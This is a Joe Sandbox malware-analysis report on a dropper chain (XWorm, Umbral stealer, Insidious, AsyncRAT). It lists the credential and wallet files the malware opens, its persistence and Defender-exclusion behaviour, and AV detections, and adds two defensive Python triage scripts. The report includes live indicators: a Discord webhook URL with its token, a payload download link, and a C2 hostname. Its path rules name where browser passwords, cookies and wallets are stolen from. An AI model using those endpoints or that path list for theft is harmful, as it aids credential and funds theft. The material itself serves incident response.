Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
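The "File opened" rows above are the part of this section an incident responder acts on: each path is a credential store or wallet, and the read alone is enough to treat its contents as taken, because Chromium keeps the key for Login Data and Cookies where a process in the user's session can unwrap it with DPAPI, and Firefox's key4.db is what decrypts the saved-password file. The following Python is an added triage helper, not part of the Joe Sandbox report or of any of the detected families: it parses rows in the report's own format (with or without a separator before "File opened"), maps every path to the class of secret it exposes, and lists the response actions that follow. SAMPLE_LINES are copies of a subset of the rows above; the RULES table, the class names and the action texts are this example's assumptions.

```python
"""
Added triage helper (not part of the Joe Sandbox report): map the 'File
opened' paths a stealer touched to the secret class each one exposes and the
response action that follows. SAMPLE_LINES are copies of rows in the
report's own format; RULES and the actions are this example's assumptions.
"""
import re
from collections import defaultdict

# Matches the report's "Source: <process>File opened: <path>" rows, with or
# without a separator between the process and the behaviour text.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*File opened:\s*(?P<path>.+?)\s*$"
)

# Ordered (path regex, secret class, response action). First match wins, so
# the extension-storage rule sits above the generic Local Storage rule.
RULES = [
    (r"\\User Data\\[^\\]+\\Login Data$", "chromium_saved_passwords",
     "rotate every password saved in the Chrome/Edge profile"),
    (r"\\User Data\\[^\\]+\\(Network\\)?Cookies$", "chromium_cookies",
     "revoke web sessions; cookies log in without the password"),
    (r"\\User Data\\[^\\]+\\Web Data$", "chromium_autofill",
     "autofill identities and stored card data exposed"),
    (r"\\User Data\\[^\\]+\\Storage\\ext\\[a-p]{32}\\", "chromium_extension_storage",
     "extension-held tokens or wallet seeds exposed"),
    (r"\\User Data\\[^\\]+\\(Local Storage|Sync Data)\\", "chromium_site_storage",
     "site tokens in Local Storage / Sync Data exposed"),
    (r"\\Firefox\\Profiles\\[^\\]+\\key4\.db$", "firefox_key_db",
     "key4.db unlocks logins.json; treat Firefox saved passwords as exposed"),
    (r"\\Firefox\\Profiles\\[^\\]+\\cert9\.db$", "firefox_cert_db",
     "client certificates and trust settings read"),
    (r"\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", "firefox_cookies",
     "revoke web sessions"),
    (r"\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$", "firefox_history",
     "browsing history read"),
    (r"\\(Electrum\\wallets|Exodus\\exodus\.wallet|Coinomi\\Coinomi\\wallets|"
     r"atomic\\Local Storage|com\.liberty\.jaxx)\\", "crypto_wallet",
     "sweep funds to a fresh wallet; seed and keystore files are compromised"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), c, a) for p, c, a in RULES]


def classify_path(path):
    """Return (secret_class, action) for a recognised artifact path, else None."""
    for rx, cls, action in COMPILED:
        if rx.search(path):
            return cls, action
    return None


def triage(report_lines):
    """Group recognised paths as {process: {secret_class: [paths]}}.

    Also returns the 'File opened' paths no rule recognised, so nothing the
    sample touched is silently dropped from the review.
    """
    hits = defaultdict(lambda: defaultdict(set))
    unknown = []
    for line in report_lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a 'File opened' row
        proc = m.group("proc").rsplit("\\", 1)[-1]
        path = m.group("path")
        found = classify_path(path)
        if found is None:
            unknown.append((proc, path))
        else:
            hits[proc][found[0]].add(path)
    return {p: {c: sorted(v) for c, v in d.items()} for p, d in hits.items()}, unknown


def required_actions(hits):
    """Deduplicated response actions, in RULES order, for every class seen."""
    seen = {cls for classes in hits.values() for cls in classes}
    return [action for _, cls, action in RULES if cls in seen]


# Copies of rows from this report section (one unrelated row included to show
# that rows other than 'File opened' are ignored).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets" "\\",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet" "\\",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation",
]

if __name__ == "__main__":
    hits, unknown = triage(SAMPLE_LINES)
    for proc, classes in hits.items():
        for cls, paths in classes.items():
            print(f"{proc}: {cls} ({len(paths)} path(s))")
    for action in required_actions(hits):
        print(" -", action)
    print("unrecognised:", unknown)
```

The unknown list is deliberate: a stealer family update that adds a new wallet or browser path shows up there instead of vanishing, and each entry in it is a rule waiting to be written.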

Remote Access Functionality

Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Insidious.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Nursultan2.exe PID: 5492, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
Source: Yara match | File source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nursultan.exe PID: 764, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Microsoft Edge.exe PID: 3056, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED
MITRE ATT&CK Matrix (rebuilt from the flattened table; the leading digits are the report's signature-count badges, techniques listed without a count had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 131 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scripting; 1 DLL Side-Loading; 121 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 121 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 File and Directory Permissions Modification; 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 111 Masquerading; 161 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 1 Query Registry; 551 Security Software Discovery; 1 Process Discovery; 161 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 3 Data from Local System; 1 Screen Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph (ID: 1505919; sample: Nursultan.exe; start date: 07/09/2024; architecture: WINDOWS; score: 100). Rebuilt as a process tree from the graph export: bracketed numbers are the graph's node IDs and each "started" edge became one level of nesting.

[2] Start
    DNS/IP: [147] freegeoip.app (signature: Tries to detect the country of the analysis system (by using the IP)); [149] stage-von.gl.at.ply.gg; [151] 3 other IPs or domains
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 28 other signatures
    [14] Nursultan.exe
        Dropped: C:\Users\user\AppData\Local\...\Nursultan.exe (PE32); C:\Users\user\AppData\...\Microsoft Edge.exe (PE32); C:\Users\user\AppData\...\Nursultan.exe.log (CSV)
        Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        [18] Nursultan.exe
            Dropped: C:\Users\user\AppData\...\Nursultan2.exe (PE32)
            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
            [27] Nursultan2.exe
                Dropped: C:\Users\user\AppData\Local\Temp\Umbral.exe (PE32); C:\Users\user\AppData\Local\...\Insidious.exe (PE32)
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
                [35] Umbral.exe
                    DNS/IP: discord.com 162.159.135.232, ports 443, 49732, 49738 (CLOUDFLARENETUS, United States)
                    Dropped: C:\ProgramData\Microsoft\...\uOWQK.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII)
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
                    [52] powershell.exe
                        Signatures: Loading BitLocker PowerShell Module
                        [71] conhost.exe
                            [90] Conhost.exe
                    [55] WMIC.exe
                        [73] conhost.exe
                    [65] 2 other processes
                        [80] conhost.exe
                [40] Insidious.exe
                    DNS/IP: freegeoip.app 188.114.97.3, ports 443, 49705, 49715 (CLOUDFLARENETUS, European Union); ipbase.com 104.21.85.189, ports 443, 49707, 49716 (CLOUDFLARENETUS, United States)
                    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
                [42] cmd.exe
                    Signatures: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                    [57] cmd.exe
                        [82] 2 other processes
                    [67] 4 other processes
                [44] Microsoft Edge.exe
            [31] Nursultan.exe
                [46] Nursultan.exe
                    [59] Nursultan.exe
                        [75] Nursultan2.exe
                            [92] cmd.exe
                                Signatures: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                                [109] cmd.exe
                                    [125] cmd.exe
                                    [127] cmd.exe
                                [111] conhost.exe
                                [113] chcp.com
                                [115] timeout.exe
                            [103] 3 other processes
                        [84] 2 other processes
                            [97] Nursultan2.exe
                                [121] cmd.exe
                            [99] Nursultan.exe
                                [123] Conhost.exe
                    [61] Nursultan2.exe
                        [77] cmd.exe
                            Signatures: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                            [95] cmd.exe
                                [117] cmd.exe
                                [119] cmd.exe
                            [105] 3 other processes
                        [86] 3 other processes
                [48] Nursultan2.exe
                    [63] cmd.exe
                        Signatures: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                        [88] 5 other processes
                            [101] cmd.exe
                            [107] 2 other processes
                    [69] 4 other processes
        [22] Microsoft Edge.exe
            DNS/IP: ip-api.com 208.95.112.1, ports 49704, 49708, 49731 (TUT-ASUS, United States); stage-von.gl.at.ply.gg 147.185.221.22, ports 19496, 49728, 49733 (SALSGIVERUS, United States)
            Dropped: C:\Users\user\AppData\...\Microsoft Edge (PE32)
            Signatures: Protects its processes via BreakOnTermination flag; Adds a directory exclusion to Windows Defender
            [33] powershell.exe
                Signatures: Loading BitLocker PowerShell Module
                [50] conhost.exe
        [25] Conhost.exe
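The behavior graph records three host-side artifacts worth checking on any machine suspected of running this chain: Umbral.exe rewrites C:\Windows\System32\drivers\etc\hosts and drops uOWQK.scr into the all-users Startup folder, and the "Microsoft Edge.exe" stage adds a directory exclusion to Windows Defender. The Python below is an added example, not part of the Joe Sandbox report, that checks a host snapshot for those three artifact classes. The snapshot contents, the hosts-file allowlist and the "user-writable directory" heuristic for exclusions are assumptions made for the example; on a live host you would feed it the real hosts file, a listing of both Startup folders and the ExclusionPath values from Get-MpPreference.

```python
"""Check a host snapshot for the artifacts this report's behavior graph attributes
to the Umbral.exe / "Microsoft Edge.exe" stages: a rewritten hosts file, a
directly executable file in the all-users Startup folder and a Windows Defender
path exclusion. Added example, not part of the report; the snapshot below is
constructed and the "suspicious location" heuristics are assumptions.
"""
import ntpath
import re

SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}
# Names a stock Windows hosts file may legitimately pin to loopback (assumption).
HOSTS_ALLOWLIST = {"localhost", "localhost.localdomain", "ip6-localhost",
                   "ip6-loopback", "broadcasthost"}
# Extensions that run directly from a Startup folder; shortcuts (.lnk) are normal there.
AUTORUN_EXTS = {".scr", ".exe", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".ps1"}
# Directories an unprivileged user (or a dropper) can write to. A Defender exclusion
# that points here is a red flag; the list is a heuristic, not from the report.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:)?\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)(?:\\|$)",
    re.IGNORECASE,
)


def hosts_sinkholes(hosts_text):
    """Return (ip, name) pairs that pin a non-loopback name to a sinkhole address."""
    findings = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        ip, *names = line.split()
        if ip in SINKHOLE_IPS:
            findings.extend((ip, n) for n in names if n.lower() not in HOSTS_ALLOWLIST)
    return findings


def startup_executables(paths):
    """Return Startup-folder entries whose extension makes them run directly."""
    return [p for p in paths if ntpath.splitext(p)[1].lower() in AUTORUN_EXTS]


def writable_exclusions(exclusion_paths):
    """Return Defender path exclusions that point into user-writable directories."""
    return [p for p in exclusion_paths if USER_WRITABLE.search(p)]


def triage_host(snapshot):
    """Run all three checks over a snapshot dict; return only the non-empty findings."""
    results = {
        "hosts_sinkholes": hosts_sinkholes(snapshot.get("hosts", "")),
        "startup_executables": startup_executables(snapshot.get("startup", [])),
        "writable_exclusions": writable_exclusions(snapshot.get("defender_exclusions", [])),
    }
    return {name: items for name, items in results.items() if items}


# Constructed snapshot (not from the report). The Startup and exclusion paths echo
# the locations the behavior graph names; the hosts entries are invented.
SAMPLE_SNAPSHOT = {
    "hosts": (
        "# Copyright (c) 1993-2009 Microsoft Corp.\n"
        "127.0.0.1 localhost\n"
        "::1 localhost\n"
        "0.0.0.0 telemetry.example.net\n"
        "0.0.0.0 updates.example.org  # added by stealer\n"
    ),
    "startup": [
        r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr",
        r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini",
        r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk",
    ],
    "defender_exclusions": [
        r"C:\Users\user\AppData\Roaming",
        r"C:\Users\user\AppData\Local\Temp",
        r"C:\Program Files\Vendor\Build",
    ],
}

if __name__ == "__main__":
    for check, items in triage_host(SAMPLE_SNAPSHOT).items():
        print(check)
        for item in items:
            print("   ", item)
```

The checks are location-based rather than name-based on purpose: the random .scr file name and the exact excluded directory vary between builds of these stealers, while "an executable in the Startup folder" and "a Defender exclusion under AppData, Temp or ProgramData" do not.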

Antivirus, Machine Learning and Genetic Malware Detection (the Link column is empty for every row)

Initial Sample
Source | Detection | Scanner | Label
Nursultan.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT
Nursultan.exe | 100% | Avira | TR/Dropper.Gen
Nursultan.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Insidious.exe | 100% | Avira | HEUR/AGEN.1307065
C:\Users\user\AppData\Local\Temp\Nursultan2.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft Edge | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | 100% | Avira | TR/Spy.Gen
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\AppData\Local\Temp\Nursultan.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Umbral.exe | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\AppData\Local\Temp\Insidious.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Nursultan2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft Edge | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Nursultan.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Umbral.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr | 92% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\Users\user\AppData\Local\Temp\Insidious.exe | 88% | ReversingLabs | ByteCode-MSIL.Infostealer.Stealgen
C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\Nursultan.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT
C:\Users\user\AppData\Local\Temp\Nursultan2.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT
C:\Users\user\AppData\Local\Temp\Umbral.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\Users\user\AppData\Roaming\Microsoft Edge | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI | 0% | Avira URL Cloud | safe
https://mail.google.com/mail/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe
https://docs.google.com/document/J | 0% | Avira URL Cloud | safe
https://discordapp.com/api/v9/users/ | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/J | 0% | Avira URL Cloud | safe
stage-von.gl.at.ply.gg | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | Avira URL Cloud | safe
https://www.youtube.com/: | 0% | Avira URL Cloud | safe
https://mail.google.com/mail/?usp=installed_webapp | 0% | Avira URL Cloud | safe
https://drive.google.com/drive/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe
https://freegeoip.app | 0% | Avira URL Cloud | safe
https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?e | 0% | Avira URL Cloud | safe
https://docs.google.com/document/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe
https://mail.google.com/mail/: | 0% | Avira URL Cloud | safe
https://docs.google.com/document/: | 0% | Avira URL Cloud | safe
http://discord.com | 0% | Avira URL Cloud | safe
https://docs.google.com/spreadsheets/J | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/: | 0% | Avira URL Cloud | safe
https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125 | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/installwebapp?usp=chr. | 0% | Avira URL Cloud | safe
https://0.0.0.0 | 0% | Avira URL Cloud | safe
